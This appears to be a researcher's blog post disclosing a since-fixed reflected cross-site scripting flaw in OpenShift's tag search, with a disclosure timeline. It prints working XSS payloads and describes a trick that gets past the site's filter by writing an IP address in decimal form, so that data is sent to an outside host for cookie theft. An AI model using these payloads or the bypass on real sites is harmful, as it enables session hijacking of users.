Reflective XSS in OpenShift by RedHat

OpenShift is an Open Hybrid Cloud Application Platform by Red Hat that allows developers to quickly develop, host, and scale applications in a cloud environment.

I have found a very simple reflective Cross-Site Scripting vulnerability on Tag searching function wasn’t filtered at all, so it was possible to display user cookies like this:<svg onload=alert(cookie)>

It soon turned out that stealing cookies is not so easy, because using a dot char (“.”) or a forward slash (“/” or “%2f“) resulted in an application error. No: for me this time…

Furthermore, the lack of dot character means that I could not use an IP address, nor file extension for cookie exfiltration. Even worse, no “http://”, nor “//” schema. But let’s take another look at XSS Filter Evasion Cheat Sheet

DWORD encoding to the rescue!

  1. Take an IP address ( – and convert it to decimal (3627733326).
  2. Set your cookie stealer at your IP address (I used “” for that).
  3. Create a payload without a dot char (“.”) or a forward slash (“/” or “%2f“). Only Firefox allowed me to use “http:” schema with those restrictions. Ladies and Gentelman, please welcome:<img src=x onerror=”location=’http:3627733326’+’%3fq=’+domain”>


[19th May 2015] - bug was reported
[25th August 2015] - another contact, no response
[2nd September 2015] - RedHat's response
[3rd September 2015] - partial fix
[7th October 2015] - bug was resolved


Leave a Reply

Your email address will not be published. Required fields are marked *